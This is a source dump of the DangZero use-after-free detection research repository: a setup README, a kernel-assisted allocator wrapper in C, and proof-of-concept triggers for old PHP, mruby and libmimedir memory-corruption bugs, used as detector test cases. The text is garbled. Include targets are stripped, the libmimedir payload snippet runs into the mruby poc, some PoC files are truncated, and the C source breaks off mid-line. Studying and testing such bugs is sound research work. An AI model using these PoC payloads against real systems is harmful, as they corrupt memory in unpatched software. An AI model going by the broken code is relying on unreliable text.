├── README.md ├── cves ├── libmimedir0.5.1-cve2015-3205 │ └── notes.txt ├── mruby-issue3515 │ ├── poc.rb │ └── run.sh ├── php5.4.44-cve2015-6835 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh ├── php5.5.14-cve2015-2787 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh ├── php7.0.7-cve2016-5773 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh └── python2.7.10-issue24613 │ └── notes.txt ├── dz.c ├── dz.h ├── gc.c ├── gc.h ├── hello.c ├── kml-image ├── Dockerfile └── build_kml.sh ├── kmod ├── Makefile └── dangmod.c ├── patchglibc.diff ├── queue.h └── test.sh /README.md: -------------------------------------------------------------------------------- 1 | # DangZero 2 | 3 | This repository contains the source code for the CCS'22 paper "DangZero: Efficient Use-After-Free Detection via Direct Page Table Access" by Floris Gorter, Koen Koning, Herbert Bos and Cristiano Giuffrida. 4 | The paper is available for download [here](https://download.vusec.net/papers/dangzero_ccs22.pdf). 5 | 6 | ## Building & Running 7 | ### Compile the KML kernel 8 | NOTE: (docker container takes about 25 GB disk space) 9 | ```shell 10 | cd kml-image 11 | bash build_kml.sh 12 | ``` 13 | 14 | ### Obtain Ubuntu 20.04 15 | ```shell 16 | cd ../ 17 | wget https://releases.ubuntu.com/20.04/ubuntu-20.04.5-desktop-amd64.iso 18 | ``` 19 | 20 | ### Create VM 21 | ```shell 22 | qemu-img create -f qcow2 ubuntu.img 60G 23 | ``` 24 | 25 | ### Install Ubuntu 26 | NOTE: these commands assume username 'u16' 27 | ```shell 28 | qemu-system-x86_64 -cdrom ubuntu-20.04.4-desktop-amd64.iso -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 16G -smp 16 29 | ``` 30 | 31 | ### Run Ubuntu 32 | ```shell 33 | qemu-system-x86_64 -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 16G -smp 16 -cpu host -net nic -net user,hostfwd=tcp::1810-:22 34 | ``` 35 | 36 | ### Move KML kernel to VM 37 | On the Guest (VM): 38 | ```shell 39 | apt-get install openssh-server 40 | ``` 41 | On the Host: 42 | ``` 43 | scp -P 1810 kml-image/linux-*.deb u16@localhost:~/ 44 | ``` 45 | ### Inside VM: Install Kernel 46 | ```shell 47 | cd ~/ 48 | sudo dpkg -i linux-*.deb 49 | ``` 50 | 51 | ### Update grub to auto-select KML kernel 52 | When not using a GUI for the VM, edit `/etc/default/grub`: 53 | ``` 54 | GRUB_DEFAULT="1>4" # depends on menu entries of grub 55 | #GRUB_TIMEOUT_STYLE=hidden # comment out 56 | GRUB_TIMEOUT=2 # if you want to see menu entries with GUI 57 | ``` 58 | 59 | ### Boot parameters 60 | Some systems may require the following boot param for booting KML (for GUI/tty). 61 | edit `/etc/default/grub`: 62 | ``` 63 | GRUB_CMDLINE_LINUX_DEFAULT="vga=normal" 64 | # Add console=ttyS0 if you want to run without GUI 65 | GRUB_CMDLINE_LINUX_DEFAULT="console=ttyS0 vga=normal" 66 | # Add make-linux-fast-again for performance: 67 | GRUB_CMDLINE_LINUX_DEFAULT="console=ttyS0 vga=normal noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off" 68 | ``` 69 | 70 | ### Run KML 71 | Suggested flags for `-cpu host`: at least `-pdpe1gb` (for DangZero performance), `-avx,-f16c,-avx512f` in case the kernel crashes on boot, e.g.: 72 | ```shell 73 | qemu-system-x86_64 -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 8G -smp 16 -cpu host,-avx,-f16c,-avx512f,-pdpe1gb -nographic -serial mon:stdio -net nic -net user,hostfwd=tcp::1810-:22 74 | ``` 75 | 76 | ### Test KML 77 | Create the /`trusted` directory (may need sudo). 
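For example (KML runs binaries placed under `/trusted` in kernel mode, which the test program below verifies):
```shell
sudo mkdir /trusted
sudo chown $USER /trusted   # optional, so the regular user can copy files in
```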
78 | Create an example `test.c` file: 79 | ```c 80 | #include 81 | #include 82 | void main(){ 83 | uint64_t cs = 0; 84 | int ring; 85 | asm("mov %%cs, %0" : "=r" (cs)); 86 | ring = (int)(cs&3); 87 | printf("running in ring %d\n", ring); 88 | } 89 | ``` 90 | Run the program inside `/trusted` and outside. Expected output: 91 | ```shell 92 | $ gcc test.c -o test 93 | $ /trusted/test 94 | running in ring 0 95 | $ /home/u16/test 96 | running in ring 3 97 | ``` 98 | 99 | ### Obtain glibc-2.31 100 | ```shell 101 | cd /trusted/ 102 | mkdir glibc 103 | cd glibc 104 | wget https://ftp.gnu.org/gnu/glibc/glibc-2.31.tar.gz 105 | tar -xf glibc-2.31.tar.gz 106 | ``` 107 | 108 | Move the glibc patch to the VM: 109 | ```shell 110 | scp -P 1810 patchglibc.diff u16@localhost:/trusted/glibc/glibc-2.31/ 111 | ``` 112 | 113 | ```shell 114 | cd /trusted/glibc/glibc-2.31 115 | patch -i patchglibc.diff -p 1 116 | mkdir build 117 | cd build 118 | sudo apt-get install bison gawk -y 119 | ../configure --prefix=/trusted/glibc/ 120 | make -j `nproc` 121 | make install 122 | ``` 123 | 124 | ### Install gcc-5 for kernel module 125 | The KML kernel requires an old gcc version for compatibility with the kernel module. 126 | ```shell 127 | echo -e "deb http://dk.archive.ubuntu.com/ubuntu/ xenial main\ndeb http://dk.archive.ubuntu.com/ubuntu/ xenial universe" | sudo tee -a /etc/apt/sources.list 128 | sudo apt-get update 129 | sudo apt install gcc-5 130 | sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-5 50 131 | sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-9 90 132 | sudo update-alternatives --config gcc 133 | # select gcc-5 134 | ``` 135 | 136 | ### Install the kernel module 137 | ```shell 138 | cd kmod 139 | make 140 | sudo insmod dangmod.ko 141 | ``` 142 | 143 | ### Test DangZero 144 | Make sure to select `gcc-9` again as primary gcc 145 | Make sure the DangZero git files also exist in the VM (e.g., `dz.c`) 146 | ```shell 147 | bash test.sh 148 | ``` 149 | -------------------------------------------------------------------------------- /cves/libmimedir0.5.1-cve2015-3205/notes.txt: -------------------------------------------------------------------------------- 1 | https://packetstormsecurity.com/files/132257/Libmimedir-VCF-Memory-Corruption-Proof-Of-Concept.html 2 | # this exploit is an arbitrary free, meaning you can control the address that is freed() 3 | # download: https://sourceforge.net/projects/libmimedir/files/latest/download 4 | # this is libmimedir 0.5.1 5 | ./configure 6 | make 7 | sudo make install 8 | # installs in /usr/local/lib/ 9 | # I moved it into /usr/local/lib/libmimedir/ 10 | # input: create the python script from link which creates free.vcf 11 | # Compile: (can add -fsanitize=address) 12 | # C file: 13 | 14 | #include 15 | #include "libmimedir.h" 16 | #include 17 | #include 18 | 19 | int main(int argc, char** argv) 20 | { 21 | // sleep(10); // gdb attach time 22 | char *num = argv[1]; 23 | char file[256]; 24 | strcpy(file, "free"); 25 | strcat(file, num); 26 | strcat(file, ".vcf"); 27 | printf("target file = %s\n", file); 28 | 29 | mdir_line** l = mdir_parse_file(file); 30 | printf("result=%p\n", l); 31 | return 0; 32 | } 33 | 34 | 35 | # Change DangZero: there is a dependency on which characters are allowed in the input, and 36 | # DangZero's default base address contains too many zeroes to trigger a free() on them 37 | # SHADOW_BASE = 0xffff964242400000 38 | # Then update the last_pt ptrs accordingly: L4 300 L3 265 L2 18 L1 0 39 | # Dump all the calls to malloc 
made by the program (resulting alias memory addresses). 40 | # Pick one around the end, for example: 0xffff964242439bb8 41 | # Update the Python POC to write 0xffff964242439bb8 instead of 0x4141414141414141 42 | 43 | def single(n): 44 | mime = "begin:vcardp 46 | mime += pack(" {} rescue 4 | Struct.new.new.to_h 5 | end 6 | end 7 | -------------------------------------------------------------------------------- /cves/mruby-issue3515/run.sh: -------------------------------------------------------------------------------- 1 | [ -d mruby ] || \ 2 | git clone https://github.com/mruby/mruby.git 3 | 4 | cd mruby 5 | git checkout -q 191ee25 6 | 7 | [ -f bin/mruby ] || 8 | rake 9 | 10 | echo [+] Running mruby poc.rb ... 11 | bin/mruby ../poc.rb 12 | -------------------------------------------------------------------------------- /cves/php5.4.44-cve2015-6835/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-5.4.44/Zend/zend_alloc.c 2015-08-05 06:34:37.000000000 +0200 2 | +++ php-5.4.44-sysalloc/Zend/zend_alloc.c 2022-06-22 10:49:12.787493736 +0200 3 | @@ -2419,6 +2419,8 @@ 4 | { 5 | TSRMLS_FETCH(); 6 | 7 | + return malloc(size); 8 | + 9 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 10 | return AG(mm_heap)->_malloc(size); 11 | } 12 | @@ -2429,6 +2431,9 @@ 13 | { 14 | TSRMLS_FETCH(); 15 | 16 | + free(ptr); 17 | + return; 18 | + 19 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 20 | AG(mm_heap)->_free(ptr); 21 | return; 22 | @@ -2440,6 +2445,8 @@ 23 | { 24 | TSRMLS_FETCH(); 25 | 26 | + return realloc(ptr, size); 27 | + 28 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 29 | return AG(mm_heap)->_realloc(ptr, size); 30 | } 31 | -------------------------------------------------------------------------------- /cves/php5.4.44-cve2015-6835/poc.php: -------------------------------------------------------------------------------- 1 | ../poc-out.txt 18 | 19 | if grep hi ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-5.4.44/Zend/zend_alloc.c 2015-08-05 06:34:37.000000000 +0200 2 | +++ php-5.4.44-sysalloc/Zend/zend_alloc.c 2022-06-22 10:49:12.787493736 +0200 3 | @@ -2419,6 +2419,8 @@ 4 | { 5 | TSRMLS_FETCH(); 6 | 7 | + return malloc(size); 8 | + 9 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 10 | return AG(mm_heap)->_malloc(size); 11 | } 12 | @@ -2429,6 +2431,9 @@ 13 | { 14 | TSRMLS_FETCH(); 15 | 16 | + free(ptr); 17 | + return; 18 | + 19 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 20 | AG(mm_heap)->_free(ptr); 21 | return; 22 | @@ -2440,6 +2445,8 @@ 23 | { 24 | TSRMLS_FETCH(); 25 | 26 | + return realloc(ptr, size); 27 | + 28 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 29 | return AG(mm_heap)->_realloc(ptr, size); 30 | } 31 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/poc.php: -------------------------------------------------------------------------------- 1 | name); 7 | } 8 | } 9 | 10 | $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:4:"name";a:2:{i:0;i:1;i:1;i:2;}}i:1;R:4;}'); 11 | 12 | for($i = 0; $i < 5; $i++) { 13 | $v[$i] = "hi" . 
$i; 14 | } 15 | 16 | var_dump($data); 17 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/run.sh: -------------------------------------------------------------------------------- 1 | set -eu 2 | 3 | [ -f php-5.5.14.tar.gz ] || \ 4 | wget "https://www.php.net/distributions/php-5.5.14.tar.gz" 5 | [ -d php-5.5.14.tar.gz ] || \ 6 | tar xf php-5.5.14.tar.gz 7 | 8 | cd php-5.5.14 9 | patch -p1 -s < ../disable_custom_allocator.patch 10 | 11 | [ -f Makefile ] || \ 12 | ./configure 13 | [ -f sapi/cli/php ] || \ 14 | make -j`nproc` 15 | 16 | # Execute the actual poc (add LD_PRELOAD here) 17 | sapi/cli/php -f ../poc.php > ../poc-out.txt 18 | 19 | if grep hi ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-7.0.7/Zend/zend_alloc.c 2016-05-25 15:13:18.000000000 +0200 2 | +++ php-7.0.7-sysalloc/Zend/zend_alloc.c 2022-06-22 12:47:41.136531039 +0200 3 | @@ -2332,7 +2332,7 @@ 4 | #endif 5 | } 6 | 7 | -#if !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__)) 8 | +#if 0 && !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__)) 9 | #undef _emalloc 10 | 11 | #if ZEND_MM_CUSTOM 12 | @@ -2437,6 +2437,7 @@ 13 | 14 | ZEND_API void* ZEND_FASTCALL _emalloc(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 15 | { 16 | + return malloc(size); 17 | 18 | #if ZEND_MM_CUSTOM 19 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 20 | @@ -2452,6 +2453,8 @@ 21 | 22 | ZEND_API void ZEND_FASTCALL _efree(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 23 | { 24 | + free(ptr); 25 | + return; 26 | 27 | #if ZEND_MM_CUSTOM 28 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 29 | @@ -2468,6 +2471,7 @@ 30 | 31 | ZEND_API void* ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 32 | { 33 | + return realloc(ptr, size); 34 | 35 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 36 | if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { 37 | @@ -2481,6 +2485,7 @@ 38 | 39 | ZEND_API void* ZEND_FASTCALL _erealloc2(void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 40 | { 41 | + return realloc(ptr, size); 42 | 43 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 44 | if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { 45 | --- php-7.0.7/Zend/zend_alloc.h 2016-05-25 15:13:18.000000000 +0200 46 | +++ php-7.0.7-sysalloc/Zend/zend_alloc.h 2022-06-22 12:46:29.785697807 +0200 47 | @@ -88,7 +88,7 @@ 48 | #include "zend_alloc_sizes.h" 49 | 50 | /* _emalloc() & _efree() specialization */ 51 | -#if !ZEND_DEBUG && defined(HAVE_BUILTIN_CONSTANT_P) 52 | +#if 0 && !ZEND_DEBUG && defined(HAVE_BUILTIN_CONSTANT_P) 53 | 54 | # define _ZEND_BIN_ALLOCATOR_DEF(_num, _size, _elements, _pages, x, y) \ 55 | ZEND_API void* ZEND_FASTCALL _emalloc_ ## _size(void) ZEND_ATTRIBUTE_MALLOC; 56 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/poc.php: -------------------------------------------------------------------------------- 1 | rc is 0 10 | $a = $unserialized_payload[1]; 11 | // Increment the reference counter by 1 again -> rc is 1 12 | $b = $a; 13 | // Trigger free of $free_me (referenced by $m[1]). 
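// The serialized payload leaves $unserialized_payload[1] with an off-by-one
// refcount, so the unset() below drops it to zero and frees the underlying
// zval while $unserialized_payload[1] still refers to it. The filler strings
// afterwards are meant to reoccupy the freed slot, so the final
// debug_zval_dump() reads through a dangling reference. With the DangZero
// wrapper preloaded, that access hits an invalidated shadow page and faults
// instead of silently reusing the memory.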
14 | unset($b); 15 | $fill_freed_space_1 = "filler_zval_1"; 16 | $fill_freed_space_2 = "filler_zval_2"; 17 | $fill_freed_space_3 = "filler_zval_3"; 18 | $fill_freed_space_4 = "filler_zval_4"; 19 | debug_zval_dump($unserialized_payload[1]); 20 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/run.sh: -------------------------------------------------------------------------------- 1 | set -eu 2 | 3 | [ -f php-7.0.7.tar.gz ] || \ 4 | wget "https://www.php.net/distributions/php-7.0.7.tar.gz" 5 | [ -d php-7.0.7.tar.gz ] || \ 6 | tar xf php-7.0.7.tar.gz 7 | 8 | cd php-7.0.7 9 | patch -p1 -s < ../disable_custom_allocator.patch 10 | 11 | [ -f Makefile ] || \ 12 | ./configure --enable-zip 13 | [ -f sapi/cli/php ] || \ 14 | make -j`nproc` 15 | 16 | # Execute the actual poc (add LD_PRELOAD here) 17 | sapi/cli/php -f ../poc.php > ../poc-out.txt 18 | 19 | if ! grep 'object(stdClass)#3 (0) refcount(1){' ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/python2.7.10-issue24613/notes.txt: -------------------------------------------------------------------------------- 1 | https://bugs.python.org/issue24613 2 | # move to /trusted: 3 | curl --create-dirs -L -o src/Python-2.7.10.tgz https://www.python.org/ftp/python/2.7.10/Python-2.7.10.tgz 4 | cd src 5 | tar -zxf Python-2.7.10.tgz 6 | cd Python-2.7.10 7 | ./configure 8 | make 9 | export DESTDIR="`pwd`/installation" 10 | make install 11 | cd installation/usr/local/bin 12 | touch poc.py 13 | # create the poc.py 14 | LD_PRELOAD=/trusted/wrap.so ./python2.7 poc.py 15 | -------------------------------------------------------------------------------- /dz.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE // for non-POSIX RTLD_NEXT 2 | #include // dlsym 3 | #include 4 | #include 5 | #include 6 | #include // malloc_usable_size 7 | #include // pid_t 8 | #include // sleep 9 | #include // strtoul 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | //#include 17 | //#include 18 | 19 | #include "queue.h" 20 | #include "dz.h" 21 | #include "gc.h" 22 | 23 | 24 | //#define __SPEC_MODE 25 | //#define __NGINX_MODE 26 | //#define __JULIET_MODE 27 | #define __CVE_MODE 28 | 29 | #ifdef __CVE_MODE 30 | #include 31 | #endif 32 | 33 | #ifdef __TRACK_MEM_USAGE 34 | #include 35 | uint64_t max_pt_count = 0; 36 | uint64_t curr_pt_count = 0; 37 | #endif 38 | 39 | //gcc -fPIC -shared -pthread -O2 -o wrap.so dz.c gc.c -ldl 40 | 41 | static uint8_t process = 0; 42 | uintptr_t* g_cr3 = NULL; 43 | 44 | #define _last_pdpt last_pdpt 45 | #define _last_pde last_pde 46 | #define _last_pte last_pte 47 | #define _last_pml4_index last_pml4_index 48 | #define _last_pdpt_index last_pdpt_index 49 | #define _last_pde_index last_pde_index 50 | #define _last_pte_index last_pte_index 51 | 52 | struct span { 53 | uintptr_t start; 54 | uintptr_t end; 55 | }; 56 | // initial main span 57 | static struct span free_span; 58 | 59 | // page walk optimization 60 | uintptr_t *last_pdpt, *last_pde, *last_pte; 61 | unsigned short last_pml4_index = PML4_SHADOW_START; 62 | unsigned short last_pdpt_index = 0; 63 | unsigned short last_pde_index = 0; 64 | unsigned short last_pte_index = USHRT_MAX; // overflow into 0 65 | 66 | typedef int (*proto_posix_memalign)(void **memptr, size_t alignment, size_t size); 67 | proto_posix_memalign 
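/*
 * Interposition note: this file is built into wrap.so (see the gcc line above)
 * and LD_PRELOADed into the target process. The malloc/calloc/realloc/free/
 * memalign/posix_memalign wrappers below forward the canonical allocations to
 * the libc-internal __libc_* entry points; __posix_memalign here holds the
 * next posix_memalign in link order, presumably resolved with
 * dlsym(RTLD_NEXT, "posix_memalign") during initialization (that code is not
 * part of this excerpt).
 */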
__posix_memalign; 68 | 69 | struct map_pa_va { 70 | uintptr_t pa; 71 | uintptr_t va; 72 | }; 73 | 74 | struct _fork_sync { 75 | pthread_mutex_t mutex; 76 | pthread_cond_t cond; 77 | int copy_done; 78 | }; 79 | 80 | struct _fork_sync* fork_sync; 81 | pthread_mutexattr_t fork_mutex_attr; 82 | pthread_condattr_t fork_cond_attr; 83 | 84 | proto_get_zeroed_page get_zeroed_page = (proto_get_zeroed_page) SYMBOL_ADDR_get_zeroed_page; 85 | proto_free_pages free_pages = (proto_free_pages) SYMBOL_ADDR_free_pages; 86 | proto___get_free_pages __get_free_pages = (proto___get_free_pages) SYMBOL_ADDR___get_free_pages; 87 | proto_kfree kfree = (proto_kfree) SYMBOL_ADDR_kfree; 88 | proto_kmalloc kmalloc = (proto_kmalloc) SYMBOL_ADDR_kmalloc; 89 | proto_kallsyms_lookup_name kallsyms_lookup_name = (proto_kallsyms_lookup_name) SYMBOL_ADDR_kallsyms_lookup_name; 90 | 91 | #ifdef __GC 92 | // fork + destructor: highest_shadow 93 | #ifdef __GC_WATERMARK 94 | uint64_t invalidated_pages = 0; 95 | #endif 96 | uint64_t highest_shadow = 0; 97 | bool fragmented = false; 98 | struct vp_span* cur_span = NULL; 99 | 100 | // free list stuff 101 | static inline size_t span_num_pages(struct vp_span *span) 102 | { 103 | return (span->end - span->start) / PGSIZE; 104 | } 105 | 106 | static inline bool span_empty(struct vp_span *span) 107 | { 108 | return span->start == span->end; 109 | } 110 | 111 | #define VP_FREELIST_INIT(PTR) { \ 112 | .items = LIST_HEAD_INITIALIZER(&(PTR)->items), \ 113 | } 114 | 115 | // bucketing 116 | //struct vp_freelist* g_freelist = NULL; 117 | uint64_t bucket_size = 0; 118 | //unsigned curr_bucket = 0; 119 | 120 | // new freelist management 121 | struct vp_freelist* opt_freelist = NULL; //VP_FREELIST_INIT(&opt_freelist); 122 | struct vp_span** sub_spans = NULL; 123 | 124 | static uint64_t shadow_pages_in_use() 125 | { 126 | uint64_t total = 0; 127 | struct vp_span *span; 128 | 129 | if(opt_freelist != NULL && opt_freelist->items.lh_first != NULL){ 130 | LIST_FOREACH(span, &(opt_freelist->items), freelist){ 131 | total += span_num_pages(span); 132 | } 133 | } 134 | 135 | uint64_t base = ((uint64_t)SHADOW_END-SHADOW_BASE) / PAGE_SIZE; // num pages 136 | 137 | return base - total; 138 | } 139 | 140 | static void update_span_last_ptrs(struct vp_span* span) 141 | { 142 | // page walk the span->start for last_ptrs 143 | uint64_t start = span->start; 144 | last_pml4_index = PML4_INDEX(start); 145 | last_pdpt = step_shadow_table(g_cr3, last_pml4_index); 146 | last_pdpt_index = PDPT_INDEX(start); 147 | last_pde = step_shadow_table(last_pdpt, last_pdpt_index); 148 | last_pde_index = PDE_INDEX(start); 149 | #ifdef __GC_PT_COMPRESS 150 | last_pte = step_shadow_table_L2cpt(last_pde, last_pde_index); 151 | #else 152 | last_pte = step_shadow_table(last_pde, last_pde_index); 153 | #endif 154 | last_pte_index = (unsigned short)(PTE_INDEX(start)-1); // alloc does ++ 155 | span->last_sync = true; 156 | } 157 | 158 | struct vp_span *try_merge_spans(struct vp_span *left, struct vp_span *right) 159 | { 160 | if (left->end != right->start) 161 | return NULL; 162 | 163 | LOG("merging span %p (%p - %p) with span %p (%p - %p)\n", 164 | left, (void *)left->start, (void *)left->end, 165 | right, (void *)right->start, (void *)right->end); 166 | 167 | // merge 'right' into 'left' 168 | left->end = right->end; 169 | LIST_REMOVE(right, freelist); 170 | 171 | // fcg: removed spans need to get zeroed out to not cause GC marking 172 | // alternatively, we can use kmalloc+kfree, but may be slower 173 | #ifdef WM_ZERO 174 | right->start 
= 0; right->end = 0; 175 | #endif 176 | WM_FREE(right); 177 | 178 | return left; 179 | } 180 | 181 | int freelist_free(struct vp_freelist *list, void *p, size_t npages) 182 | { 183 | // ASSERT0((vaddr_t)p % PGSIZE == 0); 184 | // ASSERT0(npages > 0); 185 | 186 | vaddr_t start = (vaddr_t)p; 187 | vaddr_t end = PG_OFFSET(start, npages); 188 | 189 | // find the two spans between which the new span would go 190 | struct vp_span *prev_span = NULL, *next_span; 191 | LIST_FOREACH(next_span, &list->items, freelist) { 192 | if (next_span->start >= end) 193 | break; 194 | 195 | prev_span = next_span; 196 | } 197 | 198 | // try merging with prev_span 199 | if (prev_span != NULL && prev_span->end == start) { 200 | // LOG("merging freed range %p - %p into prev span %p (%p - %p)\n", 201 | // (void *)start, (void *)end, prev_span, (void *)prev_span->start, 202 | // (void *)prev_span->end); 203 | 204 | prev_span->end = end; 205 | 206 | // try merging prev_span with next_span 207 | if (next_span != LIST_END(&list->items)) 208 | try_merge_spans(prev_span, next_span); 209 | 210 | return 0; 211 | } 212 | 213 | // try merging with next_span 214 | if (next_span != LIST_END(&list->items) && next_span->start == end) { 215 | LOG("merging freed range %p - %p into next span %p (%p - %p)\n", 216 | (void *)start, (void *)end, next_span, (void *)next_span->start, 217 | (void *)next_span->end); 218 | 219 | next_span->start = start; 220 | // lazy assign last_ptrs 221 | next_span->last_sync = false; 222 | 223 | // try merging prev_span with next_span 224 | if (prev_span) 225 | try_merge_spans(prev_span, next_span); 226 | 227 | return 0; 228 | } 229 | 230 | // failed to merge into existing spans, so we'll have to create a new span 231 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 232 | if (UNLIKELY(!span)) { 233 | LOG("could not allocate vp_span: out of memory?\n"); 234 | return -1; 235 | } 236 | 237 | span->start = start; 238 | span->end = end; 239 | // lazy assign last_ptrs 240 | span->last_sync = false; 241 | 242 | LOG("new span %p: %p - %p (%zu pages)\n", span, (void *)span->start, (void *)span->end, span_num_pages(span)); 243 | 244 | // insert the new span 245 | if (prev_span) { 246 | LIST_INSERT_AFTER(prev_span, span, freelist); 247 | } else if (next_span != LIST_END(&list->items)) { 248 | LIST_INSERT_BEFORE(next_span, span, freelist); 249 | } else { 250 | LIST_INSERT_HEAD(&list->items, span, freelist); 251 | } 252 | 253 | return 0; 254 | } 255 | 256 | static void freelist_reset(struct vp_freelist *list) 257 | { 258 | struct vp_span *span, *tmp; 259 | LIST_FOREACH_SAFE(span, &list->items, freelist, tmp) { 260 | LIST_REMOVE(span, freelist); 261 | #ifdef WM_ZERO 262 | span->start = 0; span->end = 0; 263 | #endif 264 | WM_FREE(span); 265 | } 266 | } 267 | #endif // GC 268 | 269 | static uint64_t shadow_page_size() 270 | { 271 | // size of the shadow space, i.e., 272 | // how much is currently unavailable for re-use 273 | uint64_t size = 0; 274 | #ifdef __GC 275 | if(highest_shadow != 0){ 276 | // freelist_size is in number of pages 277 | //size = ((highest_shadow - SHADOW_BASE) / PAGE_SIZE) - freelist_size(); 278 | size = shadow_pages_in_use(); 279 | } 280 | #else 281 | size = ((free_span.start - SHADOW_BASE) / PAGE_SIZE); 282 | #endif 283 | return size; 284 | } 285 | 286 | #ifdef __TRACK_SHADOW_SIZE 287 | FILE* shw_fp = NULL; 288 | uint64_t nallocs = 0; 289 | unsigned out_cnt = 0; 290 | 291 | void output_shadow_size(bool gc) 292 | { 293 | process=0; 294 | if(shw_fp == NULL){ 295 | pid_t pid = getpid(); 296 
| char piddy[6]; 297 | sprintf(piddy, "%d", pid); 298 | 299 | char path[256]; 300 | strcpy(path, "/home/u16/Documents/shadowlog_"); 301 | strcat(path, piddy); 302 | 303 | shw_fp = fopen(path, "w"); 304 | if(shw_fp == NULL){ 305 | process=1; 306 | return; 307 | } 308 | } 309 | uint64_t shadow_sz = shadow_page_size(); 310 | // __TRACK_MEM_USAGE 311 | uint64_t total_rss_pages = 0; 312 | 313 | long rss = 0L; 314 | FILE* fp = NULL; 315 | if ( (fp = fopen( "/proc/self/statm", "r" )) == NULL ){ 316 | process=1; 317 | return; /* Can't open? */ 318 | } 319 | if ( fscanf( fp, "%*s%ld", &rss ) != 1 ) 320 | { 321 | fclose( fp ); 322 | process=1; 323 | return; /* Can't read? */ 324 | } 325 | fclose( fp ); 326 | total_rss_pages = (size_t)rss; 327 | //total_rss_pages += curr_pt_count; 328 | 329 | if(gc){ 330 | #ifdef __NGINX_MODE 331 | //pid_t pid = getpid(); 332 | fprintf(shw_fp, "%u %lu %lu -- %lu %lu (gc)\n", out_cnt, nallocs, shadow_sz, total_rss_pages, curr_pt_count); 333 | #else 334 | fprintf(shw_fp, "%u %lu %lu (gc)\n", out_cnt, nallocs, shadow_sz); 335 | #endif 336 | //fprintf(shw_fp, "cpt list size %lu (gc)\n", out_cpt_list_size()); 337 | } 338 | else{ 339 | #ifdef __NGINX_MODE 340 | //pid_t pid = getpid(); 341 | fprintf(shw_fp, "%u %lu %lu -- %lu %lu\n", out_cnt, nallocs, shadow_sz, total_rss_pages, curr_pt_count); 342 | #else 343 | fprintf(shw_fp, "%u %lu %lu\n", out_cnt, nallocs, shadow_sz); 344 | #endif 345 | //fprintf(shw_fp, "cpt list size %lu\n", out_cpt_list_size()); 346 | } 347 | 348 | out_cnt++; 349 | process=1; 350 | } 351 | #endif 352 | 353 | // ---------------------- // 354 | 355 | uintptr_t* create_page_table(uintptr_t* table, unsigned short entry) 356 | { 357 | // get a kernel memory page for the new table 358 | // uintptr_t kpage = get_zeroed_page(GFP_NOWAIT); // GFP_NOWAIT 359 | 360 | uintptr_t kpage = __get_free_pages(GFP_NOWAIT, 0); 361 | memset((void*)kpage, 0, PAGE_SIZE); 362 | 363 | #ifdef __TRACK_MEM_USAGE 364 | curr_pt_count++; 365 | if(curr_pt_count > max_pt_count){ 366 | max_pt_count = curr_pt_count; 367 | } 368 | #endif 369 | 370 | // connect the previous table with the next table 371 | #ifdef __GC 372 | *(table + entry) = virt_to_phys((void*)kpage) | PAGE_PRESENT | PAGE_WRITABLE | PTE_ALIASSES; 373 | #else 374 | *(table + entry) = virt_to_phys((void*)kpage) | PAGE_PRESENT | PAGE_WRITABLE; 375 | #endif 376 | // new page in new address space, no flush TLB 377 | 378 | // return virt addr of table 379 | return (uintptr_t*)kpage; 380 | } 381 | 382 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index) 383 | { 384 | uintptr_t page = *(table+index); 385 | if(!(page & PAGE_PRESENT)) 386 | return NULL; 387 | 388 | // PAGE_FRAME to remove flag bits 389 | // PAGE_OFFSET to return kernel-space virtual address 390 | // note: make sure this cast wraps the entire result (lol) 391 | return (uintptr_t*)((page & PAGE_FRAME) + 